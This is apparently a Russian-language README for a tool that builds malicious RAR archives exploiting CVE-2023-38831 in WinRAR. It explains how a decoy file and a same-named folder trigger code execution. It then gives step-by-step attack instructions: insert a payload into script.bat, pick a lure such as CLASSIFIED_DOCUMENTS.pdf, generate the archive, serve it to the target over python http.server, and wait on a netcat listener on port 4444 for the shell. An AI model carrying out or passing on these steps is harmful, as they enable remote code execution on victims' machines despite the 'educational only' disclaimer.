
Генерирует вредоносный RAR-архив, эксплуатирующий CVE-2023-38831 в WinRAR для выполнения произвольного кода при открытии пользователем безобидного файла, с генератором эксплойтов на Python и настройкой слушателя.
⚠️ Только для образовательных и авторизованных целей исследования безопасности
Огромная благодарность оригинальному автору PoC b1tg и Group-IB Threat Intelligence
RARLabs WinRAR до версии 6.23 позволяет злоумышленникам выполнять произвольный код, когда пользователь пытается просмотреть безвредный файл внутри ZIP-архива.

Проблема возникает, потому что ZIP-архив может содержать безвредный файл (например, обычный .JPG) и папку с тем же именем, что и безвредный файл, а содержимое папки (которое может включать исполняемый код) обрабатывается при попытке доступа только к безвредному файлу. Эта уязвимость эксплуатировалась в реальных атаках с апреля по август 2023 года.

Сначала измените файл script.bat, вставив ваш опасный код выполнения
Вставьте файл-приманку, рекомендуется изображение (.png, .jpg) или документ (.pdf)
Выполните команду для создания файла эксплойта:
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
Отправьте файл эксплойта на целевую машину с помощью python http.server, например:
python -m http.server
Настройте прослушиватель на вашей атакующей машине:
nc -nlvp 4444
Загрузите и откройте файл эксплойта с помощью WinRAR версии до 6.23